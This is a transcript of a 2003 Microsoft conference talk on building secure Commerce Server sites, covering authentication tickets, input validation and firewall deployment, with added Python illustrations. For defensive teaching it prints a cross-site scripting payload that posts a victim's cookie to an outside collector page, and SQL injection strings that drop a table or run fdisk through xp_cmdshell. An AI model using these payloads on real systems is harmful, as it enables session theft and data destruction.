Transcript EBZ314

EBZ314
Building Secure Commerce
Server Sites
Peter Oehlert SDET
Yet Huynh SDE
E-Business Server
Microsoft Corporation
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Authentication Components
Authentication Tickets
Profile Ticket
Authentication Ticket
Authentication .NET Classes
Cookie or URL support
Extended property support
Authentication Filter
ISAPI Filter, requires cookies
Modes of operation: windows, custom, auto-cookie
Flexible Login and helper pages
Authentication Tickets
Profile Ticket
Tracks anonymous user
Persistent cookie
Authentication Ticket
Tracks authenticated user
Session cookie
Other features
Links to profile object via UserID stored in the ticket
Custom properties
Can also be encoded on the URL by the QueryStringBuilder class
AuthManager .NET Class
Manages authentication tickets
Sets encrypted tickets using a configurable encryption key
Support for rolling key encryption
Works in both cookie and cookieless scenarios
Login credential validation left to developer
Can use any data source as credential store
Integration with Data Warehouse
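The rolling-key feature listed above, as an added illustration written for this transcript rather than Commerce Server's own code: a ticket carries a key id, the verifier accepts any key still on the ring (so a site can roll to a new key without logging everyone out), and an expiry bounds how long a captured cookie can be replayed. Python and HMAC signing (AuthManager encrypts its tickets; only the key-rollover logic is modelled here) are assumptions, and the key ring, key ids and sample keys are constructed.

```python
# Added illustration of rolling-key ticket verification (not Commerce
# Server code). Format: "<key id>.<base64 payload>.<base64 HMAC>".
import base64
import binascii
import hashlib
import hmac
import json
import time

# Hypothetical key ring: key id -> secret. Both keys are constructed samples;
# the ring holds the previous key so tickets issued before a roll still verify.
KEYS = {
    "k1": b"old-secret-from-previous-rotation",
    "k2": b"current-secret",
}
CURRENT_KEY_ID = "k2"


def _b64(data):
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _mac(key, key_id, payload):
    # The key id is bound into the MAC so a ticket cannot be re-labelled
    # as belonging to a different key on the ring.
    return hmac.new(key, key_id.encode() + b"." + payload,
                    hashlib.sha256).digest()


def issue_ticket(user_id, ttl_seconds, now=None, key_id=CURRENT_KEY_ID):
    """Build a ticket holding the UserID and an expiry. Custom properties
    could be added to the same JSON payload."""
    now = time.time() if now is None else now
    payload = json.dumps({"uid": user_id, "exp": int(now) + ttl_seconds},
                         separators=(",", ":")).encode()
    return "%s.%s.%s" % (key_id, _b64(payload),
                         _b64(_mac(KEYS[key_id], key_id, payload)))


def verify_ticket(ticket, now=None):
    """Return the UserID if the ticket is intact, issued under a key still
    on the ring, and unexpired; otherwise None."""
    now = time.time() if now is None else now
    try:
        key_id, payload_b64, mac_b64 = ticket.split(".")
        key = KEYS[key_id]
        payload, mac = _unb64(payload_b64), _unb64(mac_b64)
    except (ValueError, KeyError, binascii.Error):
        return None
    if not hmac.compare_digest(_mac(key, key_id, payload), mac):
        return None
    claims = json.loads(payload)
    if claims["exp"] <= now:
        return None
    return claims["uid"]


def retire_key(key_id):
    """Drop an old key once every ticket issued under it has expired."""
    KEYS.pop(key_id, None)


if __name__ == "__main__":
    t = issue_ticket("user42", 600, now=1_000_000)
    print(t)
    print(verify_ticket(t, now=1_000_100))
```

The expiry is what limits the replay window the FAQ later mentions; SSL narrows how a ticket can be captured, the expiry narrows how long a captured one stays useful.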
AuthManager Scenario (Cookie)
[Sequence diagram; recovered flow:]
(1) Browser (IE, Netscape) sends a GET request to the Inetinfo process
(2) Access is denied; redirect to the Login Form (ASPX page using the Auth .NET class)
(3) Browser submits userID/Password to the logon form
(4) Redirected to the original request with cookie
(5) GET request with cookie; IsAuthenticated()? If no, back to the Logon Form; otherwise the UserId is used to Get Profile Data from the Profile Service (Application Server)
(6) Content returned
Authentication Filter
ISAPI Filter
Tightly integrated with AuthManager class
Exchange 2000 OWA support
Modes of operation
Windows Authentication (Active Directory)
Custom Authentication (Custom Database/Profile)
AutoCookie (allows mix)
Secures site at virtual directory
Requires Cookies
Authentication files located at /<vroot>/Authfiles
Custom branding
Login.asp HTML form used to submit UserID & Password, not the browser dialog box
Windows Authentication
Runs thread under logged on user context
Secure resource using ACLs
Single sign-on integration with Exchange 2000 OWA
Proxy Account Support
Granular access control using ACLs
Configurable
Can use single account for all
Map groups of logins to different proxy accounts
Custom Authentication And
AutoCookie
Runs thread under anonymous user account
Protects site at Vroot level (doesn’t use ACLs)
Allows web farm load balancing
Does not require session/server affinity
AutoCookie allows AuthFilter to issue a Profile Ticket to track anonymous users
Authentication .NET
Enhancements
Thin layer of abstraction over AuthManager
COM primary interop assembly
Authentication model remains the same (using tickets with AuthManager alone or with the AuthFilter)
Improved object model
Authentication .NET Object Model
[Class diagram; recovered members:]
AuthManager
AuthTicket (UserID, Properties…)
ProfileTicket (UserID, Properties…)
CookieSupport
SessionCookieSupport
PersistentCookieSupport
AuthenticationInfo
QueryStringBuilder
Authentication-specific exception classes
Authentication Module
HTTP module added via the web.config:
<section name="authentication"
  type="Microsoft.CommerceServer.Runtime.Configuration.CommerceAuthenticationSectionHandler, Microsoft.CommerceServer.Runtime, Version=4.5.2002.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" />
<authentication detectCookies="true" />
Creates a per-request instance of AuthenticationInfo, accessed via CommerceContext
Automatic client cookie support detection
demo
.NET Commerce
Authentication Module
Yet Huynh
SDE
E-Business Server
FAQ
Passport-like single sign-on across multiple sites
Commerce Authentication supports single sign-on across applications in the same domain and across domains that share at least one domain scope, e.g. www.CommerceServer.microsoft.com, www.Office.Microsoft.com, www.Windows.Microsoft.com.
Password cache is not encrypted in AuthFilter
Requires access to the Inetinfo process space.
AuthFilter requires the admin connection string to be a SQL connection string if running IIS 5.x
The mitigating factor is that the connection string to the admin database is stored encrypted in the registry. Also, this is no longer a limitation with IIS 6.x.
Cookie replay issue with AuthManager
This is a limitation of all authentication schemes that use cookies. A mitigating factor is to use SSL to secure access to the tickets.
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
STRIDE Threats
S - Spoofing Identity
T - Tampering with Data
R - Repudiation
I - Information Disclosure
D - Denial of Service
E - Elevation of Privilege
Common Web Security
Mistakes
All input is evil, until proven otherwise!
Cross Site Scripting
SQL Injection attacks
Cross-Site Scripting Issues
This attack has become common
Compromise the client through a flawed server
Only takes one flawed page in the domain
The mistake is echoing user input
Because the input may be script!
CSS – How it Works
http://www.a.com/hello.asp?name=Blake
Hello, <% =Request.QueryString("name") %>
http://www.b.com/gather.asp
The Bad URL
http://www.a.com/hello.asp?name=
<FORM action=http://www.b.com/gather.asp method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie; idForm.submit();
</SCRIPT>
Trusting Input - A Vulnerable Managed Code Example
using System.Data.SqlClient;
using System.Data.SqlTypes;
// Deliberately vulnerable: the company name is concatenated into the SQL text,
// so whatever the caller supplies is parsed as part of the statement.
public static SqlMoney FreightByCargo(SqlConnection conn, string company) {
    SqlCommand cmd = conn.CreateCommand();
    cmd.CommandText = "select sum(cost) as cost " +
        "from orders " +
        "where companyname = '" + company + "'";
    return new SqlMoney((decimal)cmd.ExecuteScalar());
}
Why It’s Wrong (1 Of 2)
Good Guy
Name: Foo Corp
SELECT sum(cost)
FROM orders
WHERE companyname='Foo Corp'
Bad Guy
Name: Blah' or 1=1 --
SELECT sum(cost)
FROM orders
WHERE companyname='Blah' or 1=1 -- '
Why It’s Wrong (2 Of 2)
Really Bad Guy
Name: b' drop table orders --
SELECT sum(cost)
FROM orders
WHERE companyname='b' drop table orders -- '
Downright Evil Guy
Name: b' xp_cmdshell('fdisk.exe') --
SELECT sum(cost)
FROM orders
WHERE companyname='b' xp_cmdshell('fdisk.exe') -- '
A More Secure Managed Code Example
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
// The company name travels as a bound parameter; the server never parses it as SQL.
public static SqlMoney FreightByCargo(SqlConnection conn, string company) {
    SqlCommand cmd = conn.CreateCommand();
    cmd.CommandText = "select sum(cost) as cost " +
        "from orders " +
        "where companyname = @CompanyName";
    cmd.Parameters.Add("@CompanyName", SqlDbType.NVarChar, 40).Value = company;
    return new SqlMoney((decimal)cmd.ExecuteScalar());
}
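An added example, not from the talk, that runs the FreightByCargo query both ways against an in-memory SQLite table (Python's sqlite3 standing in for SQL Server and the C# of the slides) so the effect of the Bad Guy's name on the concatenated query can be checked: the parameterized form returns nothing for the same text because the driver binds it as a value. The table contents are constructed.

```python
# Added example (not code from the talk): concatenated vs parameterized
# query over a constructed "orders" table, using the page's own inputs.
import sqlite3


def make_db():
    """Constructed sample data: two companies, three orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table orders (companyname text, cost real)")
    conn.executemany(
        "insert into orders values (?, ?)",
        [("Foo Corp", 100.0), ("Foo Corp", 50.0), ("Bar Inc", 75.0)],
    )
    return conn


def freight_concat(conn, company):
    """The vulnerable shape from the slide: input spliced into the SQL text.
    With the name "Blah' or 1=1 --" the WHERE clause becomes
    companyname='Blah' or 1=1, and the closing quote is commented away."""
    sql = ("select sum(cost) as cost from orders "
           "where companyname = '" + company + "'")
    return conn.execute(sql).fetchone()[0]


def freight_param(conn, company):
    """The remedy from the slide: a bound parameter. SQLite spells it ?
    where SQL Server uses @CompanyName; either way the value is compared,
    never re-parsed, so the same text simply matches no row."""
    sql = "select sum(cost) as cost from orders where companyname = ?"
    return conn.execute(sql, (company,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    for name in ("Foo Corp", "Blah' or 1=1 --"):
        print(repr(name), freight_concat(db, name), freight_param(db, name))
```

SUM over no rows is NULL, so the parameterized call returns None for the bad name rather than the total of every order in the table.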
Input Remedies
Determine what is valid input and reject
everything else
Use Regular Expressions
Display user input only after sanitizing it
Passwords are problematic
Escape them using Server.URLEncode or
HttpServerUtility.URLEncode
Do not construct ad-hoc SQL queries
Use parameters or stored procs
NEVER use SA or DBO to logon to SQL Server
from any application
Defeats Least Privilege Principle
Input Testing Ideas
Enumerate all entry points to the app
Sockets, RPC, pipes, files, registry keys, SOAP params, HTTP headers, form values, querystrings…
Use a tool which goes ‘underneath the radar’
Perl, C#, C++
Lie about the input
Make it too big, too small, non-existent, wrong data type…
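One way to apply the Input Remedies and the "lie about the input" testing idea from the two preceding slides, as an added example rather than code from the talk: an allow-list validator for the name value that hello.asp echoes, HTML encoding of the value before it is displayed, and a table of oversized, empty, missing and wrong-type inputs run through the validator. The pattern, the 64-character limit and the case labels are assumptions made for the demo.

```python
# Added example (not from the talk): allow-list validation, output encoding,
# and a "lie about the input" table for the hello.asp name parameter.
import html
import re

# Assumed allow list: letters, digits, spaces and a few name punctuation
# marks, 1 to 64 characters. Anything else is rejected, not cleaned up.
NAME_PATTERN = re.compile(r"^[A-Za-z0-9 .,'\-]{1,64}$")


def validate_name(value):
    """Return (ok, reason). Missing values, wrong types and out-of-range
    lengths are checked explicitly before the regular expression runs."""
    if value is None:
        return False, "missing"
    if not isinstance(value, str):
        return False, "wrong type"
    if len(value) == 0:
        return False, "empty"
    if len(value) > 64:
        return False, "too long"
    if not NAME_PATTERN.match(value):
        return False, "disallowed characters"
    return True, "ok"


def render_greeting(value):
    """What hello.asp should emit: reject bad input, and still HTML-encode
    the accepted value. The allow list and the encoder are independent
    defences, so a gap in one is covered by the other."""
    ok, reason = validate_name(value)
    if not ok:
        return "<p>Invalid name (%s)</p>" % html.escape(reason)
    return "<p>Hello, %s</p>" % html.escape(value, quote=True)


# Constructed test inputs in the spirit of "lie about the input".
LIE_CASES = {
    "too big": "A" * 65,
    "too small": "",
    "non-existent": None,
    "wrong type": 12345,
    "script": "<FORM action=http://www.b.com/gather.asp>",
}


def run_lie_cases(cases=LIE_CASES):
    """Return {case label: rejection reason} for every rejected input.
    A result holding every label means every lie was caught."""
    rejected = {}
    for label, value in cases.items():
        ok, reason = validate_name(value)
        if not ok:
            rejected[label] = reason
    return rejected


if __name__ == "__main__":
    print(render_greeting("Blake"))
    for label, reason in run_lie_cases().items():
        print("%-12s -> %s" % (label, reason))
```

Server.URLEncode / HttpServerUtility.UrlEncode from the slide are the right choice when the value goes into a URL; html.escape here is the HTML-body equivalent, and the point is the same: encode for the context the value lands in.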
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Securing Your Site
Infrastructure
Firewall
Least Privilege Accounts (SQL, NT Services)
Throttle requests (Baskets, Checkouts, IIS)
Business Desk Security
Use NTLM authentication
Restrict Access
Module
Task
Field/Property
Admin DB
Clear text connection strings to Commerce DB’s
Use Windows Integrated Security for SQL
SiteConfigReadOnly, SiteConfig, GlobalConfig
Restrict executable scripts, components
Set ACLs on components
Securing Your Site
Commerce DB
Clear text connection string in UPM BizData store
Use Windows Integrated Security for SQL
Use encrypted network connection (SSL, IPSec, multi-protocol)
Encrypt user passwords, credit cards (UPM Encryption)
Set rights on DBs, Tables, SPs
Log files
Set ACLs on log directory
Use encrypted network connection (SSL, IPSec)
Strategic Technology Protection Program
IISLockDown
URLScan
HFNetCheck
Deployment Architecture
[Network diagram; switch port labels removed. Recovered components:]
ISA Firewall (Internet-to-Web)
Web tier on Ethernet: Web Server, Web Server (NLB), SMTP Server, AD
ISA Firewall (Web-to-Data)
Data tier on Ethernet: SQL, SQL (MSCS), DW, MOM, AD, Bizdesk, Bizdesk
Firewall: Internet-to-Web
Ingress
  To Web Cluster: Web (80, 443)
  To DNS: DNS (53)
Egress
  From Web Cluster: Web (80, 443)
  From DNS: DNS (53)
  From SMTP: SMTP (25)
Firewall: Web-to-Data
Ingress
  From Web to SQL: SQL (1433), DTC (135, 5000-5020*)
  From AD to AD *
Egress
  From SQL to Web: SQL (1433), DTC (135, 5000-5020*)
* See Commerce Secure Deployment Guide
Agenda
Commerce Authentication System
Secure Site Development
Secure Deployment
Additional Resources
Questions
Resources
Bulletins & hotfixes
http://www.microsoft.com/security
IISLockDown, URLScan, HFNetCheck
http://www.microsoft.com/technet/security/tools/tools.asp?frame=true
Online Guides
Web based security in Commerce Server 2002
http://www.microsoft.com/technet/prodtechnol/comm/comm2002/maintain/cs02wsec.asp
Deploying a Secure Commerce Server 2002 Site
http://www.microsoft.com/technet/prodtechnol/comm/comm2002/deploy/SecCncpt.asp
Building Secure ASP.Net Applications
http://msdn.microsoft.com/library/en-us/dnnetsec/html/secnetlpmsdn.asp
Windows Server 2003 Security Guide
http://go.microsoft.com/fwlink/?LinkId=14845
Windows Server 2000 Security Guide
http://www.microsoft.com/technet/security/prodtech/windows/secwin2k/default.asp
Product Documentation Refresh
http://go.microsoft.com/fwlink/?LinkId=6724
Suggested Reading And Resources
The tools you need to put technology to work!
Building Solutions with Microsoft® Commerce Server 2002 (0-7356-1854)
Writing Secure Code, Second Edition
Available Today
Microsoft Press books are 20% off at the TechEd Bookstore
Also buy any TWO Microsoft Press books and get a FREE T-Shirt
Community Resources
Visit the E-Business MSFT Newsgroups
BizTalk :
http://www.microsoft.com/biztalk/community
Commerce Server:
http://www.microsoft.com/commerceserver/community
Content Management Server :
http://www.microsoft.com/cmserver/community
Share samples at http://www.gotdotnet.com
Community Resources
http://www.microsoft.com/communities/default.mspx
Most Valuable Professional (MVP)
http://www.mvp.support.microsoft.com/
Newsgroups
Converse online with Microsoft Newsgroups, including Worldwide
http://www.microsoft.com/communities/newsgroups/default.mspx
User Groups
Meet and learn with your peers
http://www.microsoft.com/communities/usergroups/default.mspx
evaluations
© 2003 Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.